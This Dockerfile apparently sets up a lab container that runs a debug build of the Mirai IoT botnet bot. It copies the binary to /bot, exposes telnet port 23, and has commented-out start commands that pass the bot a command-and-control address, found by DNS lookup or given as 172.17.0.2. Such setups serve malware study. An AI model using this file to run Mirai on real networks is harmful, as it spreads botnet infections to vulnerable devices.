FROM debian:jessie-slim
ADD ./src/mirai/debug/mirai.dbg /bot
RUN apt-get -y update \
	&& apt-get upgrade -y \
	&& apt-get install -y wget bzip2 nano\
	&& apt-get install -y dnsutils net-tools
# CMD IP=`ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'` && CNC=`nslookup cnc | awk '/^Address: / { print $2 }'` && /bot $CNC $IP $CNC 0
# CMD IP=`ifconfig eth0 | grep 'inet addr:' | cut -d: -f2 | awk '{ print $1}'` && CNC=`172.17.0.2'` && /bot $CNC $IP $CNC 0
CMD /bot
EXPOSE 23
